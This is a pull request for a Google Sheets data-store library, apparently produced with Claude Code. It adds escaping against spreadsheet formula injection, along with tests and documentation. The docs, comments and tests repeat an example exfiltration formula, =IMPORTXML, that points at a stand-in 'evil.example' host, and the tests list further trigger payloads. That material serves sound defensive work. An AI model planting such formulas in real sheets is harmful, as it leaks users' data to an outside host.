### PR TITLE
fix(core): neutralize formula injection in cell serialization

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -9,6 +9,26 @@ Security updates are applied to the latest minor release line.
 | 0.9.x   | :white_check_mark: |
 | < 0.9   | :x:                |
 
+## Formula Injection Protection
+
+Google Sheets parses written cells the way it parses typing in the UI, so a
+stored string such as `=IMPORTXML("http://evil.example/","//x")` would run as a
+live formula and could exfiltrate or spoof sheet data.
+
+`SheetsAdapter` therefore escapes every string value whose first character can
+open a formula — `=`, `+`, `-`, `@`, tab, carriage return, and the `'`
+plain-text prefix itself — by writing it behind Sheets' plain-text prefix. The
+cell holds literal text, and reads return the original string unchanged, so the
+protection is invisible to application code.
+
+Values authored by your own script can opt out per adapter with
+`allowFormulas: true`, which writes strings verbatim and lets formulas run.
+Never enable it for a store that holds user-supplied input.
+
+Note that this protects data written **through the library**. A sheet also
+consumed as a CSV export elsewhere should still be sanitized by that consumer,
+and formulas already present in a sheet before adoption are left untouched.
+
 ## Reporting a Vulnerability
 
 If you discover a security vulnerability, please **do not** open a public

--- a/packages/core/src/adapters/sheets-adapter.ts
+++ b/packages/core/src/adapters/sheets-adapter.ts
@@ -18,6 +18,19 @@ export type ColumnType =
   | 'object' 
   | 'json'
 
+/**
+ * Leading characters that make Sheets parse a written cell as a formula.
+ * `setValue`/`setValues` parse their input the way a user typing into the UI
+ * would, so '=' opens a formula, '+'/'-' open one for Lotus/Excel
+ * compatibility, and '@' is the legacy function prefix. Tab and CR are
+ * included because they are stripped before parsing, exposing whatever
+ * follows them (the OWASP formula-injection set).
+ */
+const FORMULA_TRIGGER_CHARS = ['=', '+', '-', '@', '\t', '\r']
+
+/** Prefix that forces Sheets to store a written cell as literal text. */
+const TEXT_PREFIX = "'"
+
 /** SheetsAdapter configuration options */
 export interface SheetsAdapterOptions {
   /** Spreadsheet ID (optional - uses active spreadsheet if not provided) */
@@ -51,6 +64,17 @@ export interface SheetsAdapterOptions {
    * Example: { labels: 'string[]', metadata: 'object' }
    */
   columnTypes?: Record<string, ColumnType>
+  /**
+   * Write string values verbatim, so a value starting with '=' becomes a live
+   * formula (default: false).
+   *
+   * The default escapes formula-opening characters, because any string that
+   * reaches a cell unescaped is executed by Sheets — a user-supplied
+   * `'=IMPORTXML("http://evil/","//x")'` would exfiltrate the sheet (#130).
+   * Only enable this for stores whose values are authored by the script
+   * itself and are meant to be formulas; never for user input.
+   */
+  allowFormulas?: boolean
 }
 
 
@@ -66,6 +90,7 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
   private createIfNotExists: boolean
   private idMode: IdMode
   private columnTypes: Record<string, ColumnType>
+  private allowFormulas: boolean
 
   // Sheet reference cache
   private _sheet: GoogleAppsScript.Spreadsheet.Sheet | null = null
@@ -81,7 +106,8 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
     this.createIfNotExists = options.createIfNotExists ?? true
     this.idMode = options.idMode ?? 'auto'
     this.columnTypes = options.columnTypes ?? {}
-    
+    this.allowFormulas = options.allowFormulas ?? false
+
     // Validate that id column is in columns
     if (!this.columns.includes(this.idColumn)) {
       throw new Error(`ID column '${this.idColumn}' must be included in columns`)
@@ -139,7 +165,49 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
     this._dataCache = null
   }
 
-  /** 
+  /**
+   * Prefix a string that Sheets would otherwise parse as a formula with the
+   * plain-text marker, so it is stored as the literal text it is (#130).
+   *
+   * A value already starting with the marker is escaped too, so it survives
+   * the round trip instead of losing its first character to the parser.
+   * Non-strings are returned untouched — numbers, booleans and Dates cannot
+   * open a formula.
+   */
+  private escapeCellValue(value: unknown): unknown {
+    if (this.allowFormulas) return value
+    if (typeof value !== 'string' || value.length === 0) return value
+
+    const first = value.charAt(0)
+    if (first === TEXT_PREFIX || FORMULA_TRIGGER_CHARS.indexOf(first) !== -1) {
+      return TEXT_PREFIX + value
+    }
+    return value
+  }
+
+  /**
+   * Inverse of {@link escapeCellValue}.
+   *
+   * Real Sheets consumes the marker while parsing the write, so escaped cells
+   * usually come back already unescaped and this is a no-op. Stores that keep
+   * the written text verbatim (the testing fakes, a cell pre-formatted as
+   * plain text, an imported CSV) hand the marker back, and it is dropped here.
+   * The marker is only honored in front of a character that would have needed
+   * escaping, so an apostrophe belonging to the data (`"'quoted"`) is kept.
+   */
+  private unescapeCellValue(value: unknown): unknown {
+    if (this.allowFormulas) return value
+    if (typeof value !== 'string' || value.length < 2) return value
+    if (value.charAt(0) !== TEXT_PREFIX) return value
+
+    const next = value.charAt(1)
+    if (next === TEXT_PREFIX || FORMULA_TRIGGER_CHARS.indexOf(next) !== -1) {
+      return value.slice(1)
+    }
+    return value
+  }
+
+  /**
    * Convert sheet row (array) to object
    * Uses schema-based types if available, falls back to auto-detection
    */
@@ -147,7 +215,7 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
     const obj: Record<string, unknown> = {}
     for (let i = 0; i < this.columns.length; i++) {
       const col = this.columns[i]
-      let value = values[i]
+      let value = this.unescapeCellValue(values[i])
       const colType = this.columnTypes[col]
 
       // Normalize GAS Dates to ISO strings for consistency — except for
@@ -232,25 +300,30 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
    * Uses schema-based types if available, falls back to auto-detection
    */
   private objectToRow(obj: Partial<T>): unknown[] {
-    return this.columns.map(col => {
-      const value = obj[col as keyof T]
-      const colType = this.columnTypes[col]
-      
-      // Convert undefined/null to empty string for Sheets
-      if (value === undefined || value === null) return ''
-      
-      // Schema-based serialization
-      if (colType) {
-        return this.serializeByType(value, colType)
-      }
-      
-      // Auto-detect: serialize arrays and objects to JSON
-      if (Array.isArray(value)) return JSON.stringify(value)
-      if (typeof value === 'object' && value !== null && !(value instanceof Date)) {
-        return JSON.stringify(value)
-      }
-      return value
-    })
+    // Every serialized cell goes through escapeCellValue, so no user-supplied
+    // string can reach the sheet as a live formula (#130).
+    return this.columns.map(col => this.escapeCellValue(this.serializeCell(obj, col)))
+  }
+
+  /** Serialize a single column of `obj` to its sheet representation */
+  private serializeCell(obj: Partial<T>, col: string): unknown {
+    const value = obj[col as keyof T]
+    const colType = this.columnTypes[col]
+
+    // Convert undefined/null to empty string for Sheets
+    if (value === undefined || value === null) return ''
+
+    // Schema-based serialization
+    if (colType) {
+      return this.serializeByType(value, colType)
+    }
+
+    // Auto-detect: serialize arrays and objects to JSON
+    if (Array.isArray(value)) return JSON.stringify(value)
+    if (typeof value === 'object' && value !== null && !(value instanceof Date)) {
+      return JSON.stringify(value)
+    }
+    return value
   }
 
   /** Serialize value based on column type */
@@ -363,8 +436,9 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
     
     const idColIndex = this.columns.indexOf(this.idColumn) + 1
     const idRange = sheet.getRange(2, idColIndex, lastRow - 1, 1)
-    const ids = idRange.getValues().flat()
-    
+    // Unescape so a stored id keeps matching the id the caller passes (#130).
+    const ids = idRange.getValues().flat().map(rowId => this.unescapeCellValue(rowId))
+
     // Support both string and number comparison
     const rowOffset = ids.findIndex(rowId => rowId === id || String(rowId) === String(id))
     return rowOffset === -1 ? -1 : rowOffset + 2 // +2 for header row and 1-indexing
@@ -476,7 +550,7 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
       // Cheap re-verification of the row we are about to overwrite — free here
       // because the row was read anyway, and it still guards the unlocked
       // (LockService-less) path.
-      const currentId = currentValues[this.columns.indexOf(this.idColumn)]
+      const currentId = this.unescapeCellValue(currentValues[this.columns.indexOf(this.idColumn)])
       if (currentId !== id && String(currentId) !== String(id)) return undefined
 
       const currentRow = this.rowToObject(currentValues)
@@ -583,7 +657,8 @@ export class SheetsAdapter<T extends RowWithId> implements DataStore<T> {
     const updatedRows: { rowIndex: number; values: unknown[] }[] = []
 
     for (let i = 0; i < allData.length; i++) {
-      const rowId = allData[i][idColIndex] as string | number
+      // Unescape so an escaped id still matches the caller's id (#130).
+      const rowId = this.unescapeCellValue(allData[i][idColIndex]) as string | number
       const updateData = updateMap.get(rowId) ?? updateMap.get(String(rowId))
       
       if (updateData) {

--- a/packages/core/tests/unit/formula-injection.test.ts
+++ b/packages/core/tests/unit/formula-injection.test.ts
@@ -1,0 +1,282 @@
+/**
+ * Formula injection tests (#130)
+ *
+ * A string that starts with '=' (and the other characters Sheets accepts as a
+ * formula opener) used to reach the cell verbatim, so
+ * `insert({ note: '=IMPORTXML("http://evil/","//x")' })` executed on write.
+ * SheetsAdapter now writes such values behind Sheets' plain-text prefix, and
+ * reads them back as the original string.
+ *
+ * Tests run against the FakeSheet/FakeSpreadsheet grid, which stores cells
+ * verbatim — the raw-cell assertions therefore show the escape marker that
+ * real Sheets consumes while parsing the write.
+ */
+import { describe, it, expect, afterEach } from 'vitest'
+import { SheetsAdapter } from '../../src/adapters/sheets-adapter'
+import type { FakeSheet } from '../../src/testing/fake-sheet'
+import { FakeSpreadsheet } from '../../src/testing/fake-spreadsheet'
+import { installGasFakes } from '../../src/testing/install'
+import { fromArrays } from '../../src/testing/loaders'
+
+const SPREADSHEET_ID = 'test-spreadsheet-id'
+const SHEET_NAME = 'TestSheet'
+
+interface NoteRow extends Record<string, unknown> {
+  id: number
+  note: string
+}
+
+/** Installs a fake spreadsheet holding a single sheet seeded with `data`. */
+function setup(data: unknown[][]): FakeSheet {
+  const sheet = fromArrays({ [SHEET_NAME]: data }).getSheetByName(SHEET_NAME)!
+  installGasFakes({
+    spreadsheets: { [SPREADSHEET_ID]: new FakeSpreadsheet('TestSpreadsheet', [sheet]) },
+    activeId: SPREADSHEET_ID
+  })
+  return sheet
+}
+
+function createAdapter<T extends Record<string, unknown> & { id: string | number }>(
+  columns: string[],
+  extra: Partial<ConstructorParameters<typeof SheetsAdapter>[0]> = {}
+): SheetsAdapter<T> {
+  return new SheetsAdapter<T>({
+    spreadsheetId: SPREADSHEET_ID,
+    sheetName: SHEET_NAME,
+    columns,
+    ...extra
+  })
+}
+
+/** Reads a raw cell straight from the grid, bypassing the adapter. */
+function rawCell(sheet: FakeSheet, row: number, col: number): unknown {
+  return sheet.getRange(row, col).getValues()[0][0]
+}
+
+/** A raw cell is safe when Sheets would not parse it as a formula. */
+function expectInertCell(cell: unknown): void {
+  expect(typeof cell).toBe('string')
+  const text = cell as string
+  expect(text.startsWith("'")).toBe(true)
+  for (const trigger of ['=', '+', '-', '@', '\t', '\r']) {
+    expect(text.startsWith(trigger)).toBe(false)
+  }
+}
+
+const PAYLOAD = '=IMPORTXML("http://evil.example/","//x")'
+
+const DANGEROUS_VALUES: string[] = [
+  PAYLOAD,
+  '=1+1',
+  '+1+1',
+  '-1+1',
+  '@SUM(A1)',
+  '\t=1+1',
+  '\r=1+1',
+  "'already quoted"
+]
+
+afterEach(() => {
+  delete (globalThis as Record<string, unknown>).SpreadsheetApp
+  delete (globalThis as Record<string, unknown>).LockService
+})
+
+describe('formula injection (#130)', () => {
+  describe('insert', () => {
+    it.each(DANGEROUS_VALUES)('neutralizes %j on the sheet and round-trips it', value => {
+      const sheet = setup([['id', 'note']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      const inserted = adapter.insert({ note: value })
+
+      expectInertCell(rawCell(sheet, 2, 2))
+      expect(inserted.note).toBe(value)
+      expect(adapter.findById(inserted.id)?.note).toBe(value)
+      expect(adapter.findAll()[0].note).toBe(value)
+    })
+
+    it('leaves safe values untouched', () => {
+      const sheet = setup([['id', 'note']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      adapter.insert({ note: 'hello world' })
+
+      expect(rawCell(sheet, 2, 2)).toBe('hello world')
+      expect(adapter.findAll()[0].note).toBe('hello world')
+    })
+
+    it('escapes a client-provided id that starts with a formula character', () => {
+      const sheet = setup([['id', 'note']])
+      const adapter = createAdapter<{ id: string; note: string }>(['id', 'note'], {
+        idMode: 'client'
+      })
+
+      adapter.insert({ id: '=1+1', note: 'x' })
+
+      expectInertCell(rawCell(sheet, 2, 1))
+      expect(adapter.findById('=1+1')?.note).toBe('x')
+      expect(adapter.findAll()[0].id).toBe('=1+1')
+    })
+
+    it('keeps update and delete reachable for an escaped id', () => {
+      setup([['id', 'note']])
+      const adapter = createAdapter<{ id: string; note: string }>(['id', 'note'], {
+        idMode: 'client'
+      })
+
+      adapter.insert({ id: '=1+1', note: 'x' })
+
+      expect(adapter.update('=1+1', { note: 'y' })?.note).toBe('y')
+      expect(adapter.findById('=1+1')?.note).toBe('y')
+      expect(adapter.delete('=1+1')).toBe(true)
+      expect(adapter.findAll()).toHaveLength(0)
+    })
+  })
+
+  describe('update', () => {
+    it('neutralizes a dangerous value written by update', () => {
+      const sheet = setup([['id', 'note'], [1, 'safe']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      const updated = adapter.update(1, { note: PAYLOAD })
+
+      expectInertCell(rawCell(sheet, 2, 2))
+      expect(updated?.note).toBe(PAYLOAD)
+      expect(adapter.findById(1)?.note).toBe(PAYLOAD)
+    })
+
+    it('does not re-escape an already stored value on an unrelated update', () => {
+      const sheet = setup([['id', 'note', 'other']])
+      const adapter = createAdapter<{ id: number; note: string; other: string }>([
+        'id',
+        'note',
+        'other'
+      ])
+
+      const row = adapter.insert({ note: PAYLOAD, other: 'a' })
+      adapter.update(row.id, { other: 'b' })
+
+      expect(rawCell(sheet, 2, 2)).toBe(`'${PAYLOAD}`)
+      expect(adapter.findById(row.id)?.note).toBe(PAYLOAD)
+    })
+  })
+
+  describe('batch operations and reset', () => {
+    it('neutralizes values written by batchInsert', () => {
+      const sheet = setup([['id', 'note']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      adapter.batchInsert([{ note: PAYLOAD }, { note: '+evil()' }])
+
+      expectInertCell(rawCell(sheet, 2, 2))
+      expectInertCell(rawCell(sheet, 3, 2))
+      expect(adapter.findAll().map(r => r.note)).toEqual([PAYLOAD, '+evil()'])
+    })
+
+    it('neutralizes values written by batchUpdate', () => {
+      const sheet = setup([['id', 'note'], [1, 'a'], [2, 'b']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      const results = adapter.batchUpdate([
+        { id: 1, data: { note: PAYLOAD } },
+        { id: 2, data: { note: '@SUM(A1)' } }
+      ])
+
+      expectInertCell(rawCell(sheet, 2, 2))
+      expectInertCell(rawCell(sheet, 3, 2))
+      expect(results.map(r => r.note)).toEqual([PAYLOAD, '@SUM(A1)'])
+      expect(adapter.findAll().map(r => r.note)).toEqual([PAYLOAD, '@SUM(A1)'])
+    })
+
+    it('neutralizes values written by reset', () => {
+      const sheet = setup([['id', 'note']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      adapter.reset([{ id: 1, note: PAYLOAD }])
+
+      expectInertCell(rawCell(sheet, 2, 2))
+      expect(adapter.findAll()[0].note).toBe(PAYLOAD)
+    })
+  })
+
+  describe('typed columns', () => {
+    it('escapes dangerous strings in string columns only', () => {
+      const sheet = setup([['id', 'note', 'count', 'active', 'when', 'meta']])
+      const adapter = createAdapter<{
+        id: number
+        note: string
+        count: number
+        active: boolean
+        when: Date
+        meta: Record<string, unknown>
+      }>(['id', 'note', 'count', 'active', 'when', 'meta'], {
+        columnTypes: {
+          note: 'string',
+          count: 'number',
+          active: 'boolean',
+          when: 'date',
+          meta: 'json'
+        }
+      })
+
+      const when = new Date('2026-01-02T03:04:05.000Z')
+      const row = adapter.insert({
+        note: PAYLOAD,
+        count: -5,
+        active: true,
+        when,
+        meta: { a: 1 }
+      })
+
+      expectInertCell(rawCell(sheet, 2, 2))
+      expect(rawCell(sheet, 2, 3)).toBe(-5)
+      expect(rawCell(sheet, 2, 4)).toBe('TRUE')
+      expect(rawCell(sheet, 2, 5)).toBe(when.toISOString())
+      expect(rawCell(sheet, 2, 6)).toBe('{"a":1}')
+
+      const read = adapter.findById(row.id)
+      expect(read?.note).toBe(PAYLOAD)
+      expect(read?.count).toBe(-5)
+      expect(read?.active).toBe(true)
+      expect((read?.when as Date).toISOString()).toBe(when.toISOString())
+      expect(read?.meta).toEqual({ a: 1 })
+    })
+  })
+
+  describe('reading pre-existing data', () => {
+    it('returns unescaped legacy cells verbatim', () => {
+      setup([['id', 'note'], [1, 'plain text'], [2, "it's fine"]])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      expect(adapter.findAll().map(r => r.note)).toEqual(['plain text', "it's fine"])
+    })
+
+    it('does not strip an apostrophe that is part of the data', () => {
+      setup([['id', 'note'], [1, "'quoted word"]])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      expect(adapter.findById(1)?.note).toBe("'quoted word")
+    })
+  })
+
+  describe('allowFormulas opt-out', () => {
+    it('writes formulas verbatim when explicitly allowed', () => {
+      const sheet = setup([['id', 'note']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'], { allowFormulas: true })
+
+      const row = adapter.insert({ note: '=SUM(A1:A2)' })
+
+      expect(rawCell(sheet, 2, 2)).toBe('=SUM(A1:A2)')
+      expect(adapter.findById(row.id)?.note).toBe('=SUM(A1:A2)')
+    })
+
+    it('is off by default', () => {
+      const sheet = setup([['id', 'note']])
+      const adapter = createAdapter<NoteRow>(['id', 'note'])
+
+      adapter.insert({ note: '=SUM(A1:A2)' })
+
+      expect(rawCell(sheet, 2, 2)).not.toBe('=SUM(A1:A2)')
+    })
+  })
+})

--- a/packages/skills/skills/gsquery/references/adapters-and-config.md
+++ b/packages/skills/skills/gsquery/references/adapters-and-config.md
@@ -118,6 +118,7 @@ interface SheetsAdapterOptions {
   idColumn?: string                 // deprecated — 1.0 fixes it at 'id'
   idMode?: IdMode
   columnTypes?: Record<string, ColumnType>
+  allowFormulas?: boolean           // default: false — see Formula safety
 }
 
 type ColumnType =
@@ -137,6 +138,9 @@ type ColumnType =
 - **LockService**: Concurrent-safe auto-increment ID generation
 - **Column types**: Automatic serialization/deserialization (JSON for arrays/objects, booleans, dates)
 - **Auto-detect JSON**: Parses JSON strings in cells automatically
+- **Formula safety**: Strings starting with `=`, `+`, `-`, `@`, tab or CR are written as literal
+  text (Sheets would otherwise run them as formulas) and read back unchanged. Opt out per
+  adapter with `allowFormulas: true` — script-authored formulas only, never user input.
 
 ### Sheets-Specific Methods
 

--- a/website/docs/adapters.md
+++ b/website/docs/adapters.md
@@ -117,9 +117,18 @@ const store = new SheetsAdapter<User>({
   columnTypes: {                   // optional: explicit type serialization
     tags: 'string[]',
     metadata: 'json'
-  }
+  },
+  allowFormulas: false             // default: false, see Formula Safety below
 })
 ```
+
+### Formula Safety
+
+Strings that start with `=`, `+`, `-`, `@`, a tab or a carriage return would be
+parsed by Sheets as formulas, so `SheetsAdapter` writes them as literal text and
+returns the original string on read. Set `allowFormulas: true` only when the
+values come from your own script and are meant to run as formulas — never for
+user input.
 
 ### Column Types
 


### PR DESCRIPTION
## Summary

User-supplied strings starting with `=` (and other trigger characters) were written verbatim and executed as live formulas — a data-exfiltration/spoofing vector for any field carrying user input. Cell values are now escaped on serialize (leading `'` prefix, OWASP trigger set: `=`, `+`, `-`, `@`, tab, CR, plus `'` itself so apostrophe-leading data round-trips) and symmetrically un-escaped on deserialize, with the un-escape guarded so an apostrophe that is genuine data is never stripped. Both ID-lookup sites un-escape so escaped string IDs stay findable.

Opt-out `allowFormulas?: boolean` (default `false`) gates escape and un-escape together for users who intentionally store formulas. SECURITY.md gains a "Formula Injection Protection" section; adapter docs updated.

21 new tests (15 failing before the fix) cover every write path (insert/update/batchInsert/batchUpdate/reset), round-trips, typed columns, and the opt-out.

## Related Issues

Closes #130

## Type of Change

- [x] Bug fix
- [ ] New feature
- [ ] Breaking change
- [ ] Documentation
- [ ] Refactor / chore

## Checklist

- [x] Targets the `dev` branch
- [x] Tests added or updated
- [x] `pnpm test` passes (899 tests)
- [x] `pnpm build` passes
- [x] Follows Conventional Commits
- [x] Docs/comments are in English

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01Y9hSihptvSe5pSDyihvTYp

---
_Generated by [Claude Code](https://claude.ai/code/session_01Y9hSihptvSe5pSDyihvTYp)_